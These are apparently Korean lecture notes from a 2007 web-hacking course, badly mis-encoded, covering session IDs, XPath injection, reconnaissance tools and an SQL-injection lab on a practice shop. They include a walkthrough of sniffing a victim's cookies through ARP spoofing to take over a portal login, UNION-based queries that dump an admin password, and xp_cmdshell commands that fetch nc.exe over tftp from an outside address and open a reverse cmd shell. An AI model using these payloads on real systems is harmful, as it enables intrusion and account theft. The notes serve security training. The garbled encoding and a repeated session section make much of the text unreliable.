์ฃผ๋กœ Web Application Server ๋‚˜ Web Server ๋ฅผ ํ•›๋‹น ๋ฐ›์œผ๋ฉฐ ์ด๋•Œ ํ•ด๋‹น ID์— ํŠน์ • ์ •๋ณด๋ฅผ ์ €์žฅํ•› ์ˆ˜ ์žˆ์Œ

ํด๋ผ์ด์–ถํŠธ๋Š” ์„œ๋ฒ„์™€ ํ†ต์‹ž์‹œ SESSION ID๋งŒ ์ฃผ๊ณ  ๋ฐ›์Œ

์„ธ์…˜ID

WASWS ์„ธ์…˜ ID๋ณ€์ˆ˜

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 5

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

